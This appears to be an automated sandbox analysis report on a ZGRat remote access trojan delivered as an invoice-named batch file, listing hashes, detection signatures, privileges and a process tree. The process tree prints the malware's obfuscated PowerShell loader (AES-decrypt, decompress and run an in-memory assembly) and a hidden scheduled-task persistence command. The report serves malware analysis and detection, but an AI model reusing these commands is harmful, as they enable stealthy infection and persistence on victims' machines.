zgrat | ea339584b9614ad651f5733d92248c680e7120b1bf548159c63f2761b4670c79

Analysis

max time kernel
147s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2024, 12:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EBKG08283398 INV.NO.313_SC_SC.bat
Size

1.5MB
MD5

891b1780e08638a8311b1e5ae2bd670e
SHA1

0504a30572e0a54475ce8e0372b8132cfc567f6d
SHA256

3eeecf195767fc31136365220f549d915c97b0a59194fbbe93f019e8a57fb110
SHA512

55f6b49c1a43d8410c5d7ed90eaacc7034cf36acea30c8aac0981722be40b9f9060dbc19d8b230eb16af9b27a7287e19f36b48614772dcd1b4d2c39f55ba9415
SSDEEP

24576:xWnPze4mISNmnNrdVPkEcoGHNo/RjRem3Pjw1ansgpM5u6Zr7HVBfGX8HdtWcVu/:4Pyp+RPW9hlhep

Score

10^/10

zgrat rat

Malware Config

Signatures

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/4560-2451-0x0000017B2BCF0000-0x0000017B2BD5E000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
44	4560	powershell.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1672	powershell.exe
1672	powershell.exe
3456	powershell.exe
3456	powershell.exe
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
3680	powershell.exe
3680	powershell.exe
3680	powershell.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
2936	powershell.exe
2936	powershell.exe
3120	powershell.exe
3120	powershell.exe
3120	powershell.exe
4252	powershell.exe
4252	powershell.exe
4252	powershell.exe
4560	powershell.exe
4560	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeIncreaseQuotaPrivilege	4148	powershell.exe
Token: SeSecurityPrivilege	4148	powershell.exe
Token: SeTakeOwnershipPrivilege	4148	powershell.exe
Token: SeLoadDriverPrivilege	4148	powershell.exe
Token: SeSystemProfilePrivilege	4148	powershell.exe
Token: SeSystemtimePrivilege	4148	powershell.exe
Token: SeProfSingleProcessPrivilege	4148	powershell.exe
Token: SeIncBasePriorityPrivilege	4148	powershell.exe
Token: SeCreatePagefilePrivilege	4148	powershell.exe
Token: SeBackupPrivilege	4148	powershell.exe
Token: SeRestorePrivilege	4148	powershell.exe
Token: SeShutdownPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeSystemEnvironmentPrivilege	4148	powershell.exe
Token: SeRemoteShutdownPrivilege	4148	powershell.exe
Token: SeUndockPrivilege	4148	powershell.exe
Token: SeManageVolumePrivilege	4148	powershell.exe
Token: 33	4148	powershell.exe
Token: 34	4148	powershell.exe
Token: 35	4148	powershell.exe
Token: 36	4148	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeIncreaseQuotaPrivilege	3680	powershell.exe
Token: SeSecurityPrivilege	3680	powershell.exe
Token: SeTakeOwnershipPrivilege	3680	powershell.exe
Token: SeLoadDriverPrivilege	3680	powershell.exe
Token: SeSystemProfilePrivilege	3680	powershell.exe
Token: SeSystemtimePrivilege	3680	powershell.exe
Token: SeProfSingleProcessPrivilege	3680	powershell.exe
Token: SeIncBasePriorityPrivilege	3680	powershell.exe
Token: SeCreatePagefilePrivilege	3680	powershell.exe
Token: SeBackupPrivilege	3680	powershell.exe
Token: SeRestorePrivilege	3680	powershell.exe
Token: SeShutdownPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeSystemEnvironmentPrivilege	3680	powershell.exe
Token: SeRemoteShutdownPrivilege	3680	powershell.exe
Token: SeUndockPrivilege	3680	powershell.exe
Token: SeManageVolumePrivilege	3680	powershell.exe
Token: 33	3680	powershell.exe
Token: 34	3680	powershell.exe
Token: 35	3680	powershell.exe
Token: 36	3680	powershell.exe
Token: SeIncreaseQuotaPrivilege	3680	powershell.exe
Token: SeSecurityPrivilege	3680	powershell.exe
Token: SeTakeOwnershipPrivilege	3680	powershell.exe
Token: SeLoadDriverPrivilege	3680	powershell.exe
Token: SeSystemProfilePrivilege	3680	powershell.exe
Token: SeSystemtimePrivilege	3680	powershell.exe
Token: SeProfSingleProcessPrivilege	3680	powershell.exe
Token: SeIncBasePriorityPrivilege	3680	powershell.exe
Token: SeCreatePagefilePrivilege	3680	powershell.exe
Token: SeBackupPrivilege	3680	powershell.exe
Token: SeRestorePrivilege	3680	powershell.exe
Token: SeShutdownPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeSystemEnvironmentPrivilege	3680	powershell.exe
Token: SeRemoteShutdownPrivilege	3680	powershell.exe
Token: SeUndockPrivilege	3680	powershell.exe
Token: SeManageVolumePrivilege	3680	powershell.exe
Token: 33	3680	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 1564	2376	cmd.exe	86
PID 2376 wrote to memory of 1564	2376	cmd.exe	86
PID 2376 wrote to memory of 2328	2376	cmd.exe	87
PID 2376 wrote to memory of 2328	2376	cmd.exe	87
PID 2328 wrote to memory of 2928	2328	cmd.exe	89
PID 2328 wrote to memory of 2928	2328	cmd.exe	89
PID 2328 wrote to memory of 768	2328	cmd.exe	90
PID 2328 wrote to memory of 768	2328	cmd.exe	90
PID 2328 wrote to memory of 1672	2328	cmd.exe	91
PID 2328 wrote to memory of 1672	2328	cmd.exe	91
PID 1672 wrote to memory of 3456	1672	powershell.exe	95
PID 1672 wrote to memory of 3456	1672	powershell.exe	95
PID 1672 wrote to memory of 4148	1672	powershell.exe	100
PID 1672 wrote to memory of 4148	1672	powershell.exe	100
PID 1672 wrote to memory of 3680	1672	powershell.exe	103
PID 1672 wrote to memory of 3680	1672	powershell.exe	103
PID 1672 wrote to memory of 4448	1672	powershell.exe	107
PID 1672 wrote to memory of 4448	1672	powershell.exe	107
PID 4448 wrote to memory of 1492	4448	cmd.exe	109
PID 4448 wrote to memory of 1492	4448	cmd.exe	109
PID 1492 wrote to memory of 4272	1492	cmd.exe	111
PID 1492 wrote to memory of 4272	1492	cmd.exe	111
PID 1492 wrote to memory of 1000	1492	cmd.exe	112
PID 1492 wrote to memory of 1000	1492	cmd.exe	112
PID 1492 wrote to memory of 4560	1492	cmd.exe	113
PID 1492 wrote to memory of 4560	1492	cmd.exe	113
PID 4560 wrote to memory of 2936	4560	powershell.exe	114
PID 4560 wrote to memory of 2936	4560	powershell.exe	114
PID 4560 wrote to memory of 3120	4560	powershell.exe	115
PID 4560 wrote to memory of 3120	4560	powershell.exe	115
PID 4560 wrote to memory of 4252	4560	powershell.exe	117
PID 4560 wrote to memory of 4252	4560	powershell.exe	117

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EBKG08283398 INV.NO.313_SC_SC.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\system32\cmd.exe
  cmd /c \"set __=^&rem\
  2⤵
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\EBKG08283398 INV.NO.313_SC_SC.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\EBKG08283398 INV.NO.313_SC_SC.bat';$eZZd='TraBBMpnsBBMpfBBMpoBBMprBBMpmFBBMpinBBMpaBBMplBlBBMpockBBMp'.Replace('BBMp', ''),'CoJSvnpyJSvnToJSvn'.Replace('JSvn', ''),'LbHFcobHFcabHFcdbHFc'.Replace('bHFc', ''),'RWXmbeaWXmbdLiWXmbnWXmbesWXmb'.Replace('WXmb', ''),'MapiPcipiPcnpiPcModpiPculpiPcepiPc'.Replace('piPc', ''),'ChmVPqanmVPqgemVPqEmVPqxtemVPqnsmVPqiomVPqnmVPq'.Replace('mVPq', ''),'EQLyPntrQLyPyPQLyPoiQLyPnQLyPtQLyP'.Replace('QLyP', ''),'FroZqEPmBaZqEPseZqEP6ZqEP4SZqEPtrZqEPiZqEPngZqEP'.Replace('ZqEP', ''),'EleKqNfmKqNfeKqNfntKqNfAtKqNf'.Replace('KqNf', ''),'Degutycogutymprgutyesgutysguty'.Replace('guty', ''),'SlSUwpllSUwitlSUw'.Replace('lSUw', ''),'GCyZyeCyZytCyZyCuCyZyrrCyZyenCyZytPCyZyroCyZyceCyZyssCyZy'.Replace('CyZy', ''),'CrcGjUeacGjUteDcGjUecrcGjUycGjUpcGjUtocGjUrcGjU'.Replace('cGjU', ''),'InfjSjvofjSjkfjSjefjSj'.Replace('fjSj', '');powershell -w hidden;function RBOZM($audIJ){$rMFLL=[System.Security.Cryptography.Aes]::Create();$rMFLL.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rMFLL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rMFLL.Key=[System.Convert]::($eZZd[7])('KJtBASkvNW0cEQWlBfl+UBf+4+5C4g5U9XIHbW7gK/M=');$rMFLL.IV=[System.Convert]::($eZZd[7])('bkEP1P5nsnizVReBKNdEng==');$EsLAN=$rMFLL.($eZZd[12])();$MjwxU=$EsLAN.($eZZd[0])($audIJ,0,$audIJ.Length);$EsLAN.Dispose();$rMFLL.Dispose();$MjwxU;}function ASQEn($audIJ){$JGBKZ=New-Object System.IO.MemoryStream(,$audIJ);$qvsJb=New-Object System.IO.MemoryStream;$NCQzh=New-Object System.IO.Compression.GZipStream($JGBKZ,[IO.Compression.CompressionMode]::($eZZd[9]));$NCQzh.($eZZd[1])($qvsJb);$NCQzh.Dispose();$JGBKZ.Dispose();$qvsJb.Dispose();$qvsJb.ToArray();}$lxlHN=[System.IO.File]::($eZZd[3])([Console]::Title);$qeLZp=ASQEn (RBOZM ([Convert]::($eZZd[7])([System.Linq.Enumerable]::($eZZd[8])($lxlHN, 5).Substring(2))));$ikKzu=ASQEn (RBOZM ([Convert]::($eZZd[7])([System.Linq.Enumerable]::($eZZd[8])($lxlHN, 6).Substring(2))));[System.Reflection.Assembly]::($eZZd[2])([byte[]]$ikKzu).($eZZd[6]).($eZZd[13])($null,$null);[System.Reflection.Assembly]::($eZZd[2])([byte[]]$qeLZp).($eZZd[6]).($eZZd[13])($null,$null); "
    3⤵
    PID:768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3456
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\EBKG08283398 INV.NO.313_SC_SC')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 56855' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3680
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1492
      - C:\Windows\system32\cmd.exe
        
        cmd /c \"set __=^&rem\
        6⤵
        
        PID:4272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$eZZd='TraBBMpnsBBMpfBBMpoBBMprBBMpmFBBMpinBBMpaBBMplBlBBMpockBBMp'.Replace('BBMp', ''),'CoJSvnpyJSvnToJSvn'.Replace('JSvn', ''),'LbHFcobHFcabHFcdbHFc'.Replace('bHFc', ''),'RWXmbeaWXmbdLiWXmbnWXmbesWXmb'.Replace('WXmb', ''),'MapiPcipiPcnpiPcModpiPculpiPcepiPc'.Replace('piPc', ''),'ChmVPqanmVPqgemVPqEmVPqxtemVPqnsmVPqiomVPqnmVPq'.Replace('mVPq', ''),'EQLyPntrQLyPyPQLyPoiQLyPnQLyPtQLyP'.Replace('QLyP', ''),'FroZqEPmBaZqEPseZqEP6ZqEP4SZqEPtrZqEPiZqEPngZqEP'.Replace('ZqEP', ''),'EleKqNfmKqNfeKqNfntKqNfAtKqNf'.Replace('KqNf', ''),'Degutycogutymprgutyesgutysguty'.Replace('guty', ''),'SlSUwpllSUwitlSUw'.Replace('lSUw', ''),'GCyZyeCyZytCyZyCuCyZyrrCyZyenCyZytPCyZyroCyZyceCyZyssCyZy'.Replace('CyZy', ''),'CrcGjUeacGjUteDcGjUecrcGjUycGjUpcGjUtocGjUrcGjU'.Replace('cGjU', ''),'InfjSjvofjSjkfjSjefjSj'.Replace('fjSj', '');powershell -w hidden;function RBOZM($audIJ){$rMFLL=[System.Security.Cryptography.Aes]::Create();$rMFLL.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rMFLL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rMFLL.Key=[System.Convert]::($eZZd[7])('KJtBASkvNW0cEQWlBfl+UBf+4+5C4g5U9XIHbW7gK/M=');$rMFLL.IV=[System.Convert]::($eZZd[7])('bkEP1P5nsnizVReBKNdEng==');$EsLAN=$rMFLL.($eZZd[12])();$MjwxU=$EsLAN.($eZZd[0])($audIJ,0,$audIJ.Length);$EsLAN.Dispose();$rMFLL.Dispose();$MjwxU;}function ASQEn($audIJ){$JGBKZ=New-Object System.IO.MemoryStream(,$audIJ);$qvsJb=New-Object System.IO.MemoryStream;$NCQzh=New-Object System.IO.Compression.GZipStream($JGBKZ,[IO.Compression.CompressionMode]::($eZZd[9]));$NCQzh.($eZZd[1])($qvsJb);$NCQzh.Dispose();$JGBKZ.Dispose();$qvsJb.Dispose();$qvsJb.ToArray();}$lxlHN=[System.IO.File]::($eZZd[3])([Console]::Title);$qeLZp=ASQEn (RBOZM ([Convert]::($eZZd[7])([System.Linq.Enumerable]::($eZZd[8])($lxlHN, 5).Substring(2))));$ikKzu=ASQEn (RBOZM ([Convert]::($eZZd[7])([System.Linq.Enumerable]::($eZZd[8])($lxlHN, 6).Substring(2))));[System.Reflection.Assembly]::($eZZd[2])([byte[]]$ikKzu).($eZZd[6]).($eZZd[13])($null,$null);[System.Reflection.Assembly]::($eZZd[2])([byte[]]$qeLZp).($eZZd[6]).($eZZd[13])($null,$null); "
        6⤵
        
        PID:1000
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 56855' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4252

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0468eec5fc80097f1510bea6510b871a

SHA1
6ca4887ca75230345c28f4c86ca8edd75e1feb6f

SHA256
e0ba97577434dfec56f8e883da832f5ea8e89644922029c5fd17d5dbfe35927a

SHA512
e289f6679edc8b6a268f4aa15a9403beb22db7af422b29318d3493a1c55838939d77b7297fd75612a09399abd3782924f493326f53904e3a74d4ee40163a2990

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b09e69e0bba8a3de744e887864787a5d

SHA1
f8e69700a220ad2899a589efa5bbe5fd003a7619

SHA256
4e46e9d73939a238385d0429fbc1fb00f1f0297f3ed4306ac8ca9ac9be40eab0

SHA512
0db0ba27863111ed0ffc78db6de736f8e88bd350d29082c3ce6d87185d24ae294676b1ac96b972467cbba962774184a7ff85382e4cb84d28ff87ba2017652e5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c118e29489863b7d5859e4e697842329

SHA1
ede543c75580fa7caba7d21f42d674248e3c0885

SHA256
22d4ec09704d261479cf9521f93ba4840fbe93601f69fb2dd71e6c936dcae091

SHA512
868ba879e1a4e5c43824abd70b29ac97a8153b8f9dc49b8d378ca465715ab1833d3d87ba5a0eb4eb7543b5d8cc561946441626e25c0c60afb90bea020113ed44

Download Submit
C:\Users\Admin\AppData\Local\Temp\Hiszhjnx.tmpdb

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rloifabpv.tmpdb

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jkopq5sx.xbk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\strt.cmd

Filesize
1.5MB

MD5
891b1780e08638a8311b1e5ae2bd670e

SHA1
0504a30572e0a54475ce8e0372b8132cfc567f6d

SHA256
3eeecf195767fc31136365220f549d915c97b0a59194fbbe93f019e8a57fb110

SHA512
55f6b49c1a43d8410c5d7ed90eaacc7034cf36acea30c8aac0981722be40b9f9060dbc19d8b230eb16af9b27a7287e19f36b48614772dcd1b4d2c39f55ba9415

Download Submit
memory/1672-68-0x000001EC7B6F0000-0x000001EC7B700000-memory.dmp

Filesize
64KB

Download
memory/1672-60-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/1672-85-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/1672-0-0x000001EC7B690000-0x000001EC7B6B2000-memory.dmp

Filesize
136KB

Download
memory/1672-81-0x000001EC7B6F0000-0x000001EC7B700000-memory.dmp

Filesize
64KB

Download
memory/1672-10-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/1672-14-0x000001EC7DC90000-0x000001EC7DD06000-memory.dmp

Filesize
472KB

Download
memory/1672-31-0x000001EC7B6E0000-0x000001EC7B6E1000-memory.dmp

Filesize
4KB

Download
memory/1672-69-0x000001EC7B6F0000-0x000001EC7B700000-memory.dmp

Filesize
64KB

Download
memory/1672-30-0x000001EC7D870000-0x000001EC7D8E0000-memory.dmp

Filesize
448KB

Download
memory/1672-11-0x000001EC7B6F0000-0x000001EC7B700000-memory.dmp

Filesize
64KB

Download
memory/1672-12-0x000001EC7B6F0000-0x000001EC7B700000-memory.dmp

Filesize
64KB

Download
memory/1672-13-0x000001EC7DC40000-0x000001EC7DC84000-memory.dmp

Filesize
272KB

Download
memory/1672-32-0x000001EC7DD10000-0x000001EC7DDE8000-memory.dmp

Filesize
864KB

Download
memory/2936-87-0x0000015DC4070000-0x0000015DC4080000-memory.dmp

Filesize
64KB

Download
memory/2936-97-0x0000015DC4070000-0x0000015DC4080000-memory.dmp

Filesize
64KB

Download
memory/2936-99-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/2936-86-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/3120-101-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/3120-102-0x000001E7CE940000-0x000001E7CE950000-memory.dmp

Filesize
64KB

Download
memory/3120-113-0x000001E7CE940000-0x000001E7CE950000-memory.dmp

Filesize
64KB

Download
memory/3120-115-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/3456-29-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/3456-17-0x000002356B280000-0x000002356B290000-memory.dmp

Filesize
64KB

Download
memory/3456-16-0x000002356B280000-0x000002356B290000-memory.dmp

Filesize
64KB

Download
memory/3456-15-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/3680-63-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/3680-61-0x00000222117A0000-0x00000222117B0000-memory.dmp

Filesize
64KB

Download
memory/3680-59-0x00000222117A0000-0x00000222117B0000-memory.dmp

Filesize
64KB

Download
memory/3680-57-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/4148-47-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/4148-45-0x00000211F4A10000-0x00000211F4A20000-memory.dmp

Filesize
64KB

Download
memory/4148-44-0x00000211F4A10000-0x00000211F4A20000-memory.dmp

Filesize
64KB

Download
memory/4148-39-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/4252-127-0x00000292771E0000-0x00000292771F0000-memory.dmp

Filesize
64KB

Download
memory/4252-129-0x00000292771E0000-0x00000292771F0000-memory.dmp

Filesize
64KB

Download
memory/4252-126-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/4252-132-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/4560-165-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-146-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-130-0x0000017B10CC0000-0x0000017B10CD0000-memory.dmp

Filesize
64KB

Download
memory/4560-82-0x0000017B10CC0000-0x0000017B10CD0000-memory.dmp

Filesize
64KB

Download
memory/4560-133-0x0000017B2BA00000-0x0000017B2BAD8000-memory.dmp

Filesize
864KB

Download
memory/4560-134-0x0000017B2BAE0000-0x0000017B2BBF6000-memory.dmp

Filesize
1.1MB

Download
memory/4560-135-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-136-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-138-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-140-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-142-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-144-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-169-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-148-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-150-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-152-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-154-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-156-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-158-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-160-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-163-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-84-0x0000017B10CC0000-0x0000017B10CD0000-memory.dmp

Filesize
64KB

Download
memory/4560-128-0x00007FFBD9580000-0x00007FFBDA041000-memory.dmp

Filesize
10.8MB

Download
memory/4560-167-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-185-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-173-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-175-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-177-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-179-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-181-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-183-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-171-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-187-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-189-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-191-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
memory/4560-193-0x0000017B2BAE0000-0x0000017B2BBF1000-memory.dmp

Filesize
1.1MB

Download
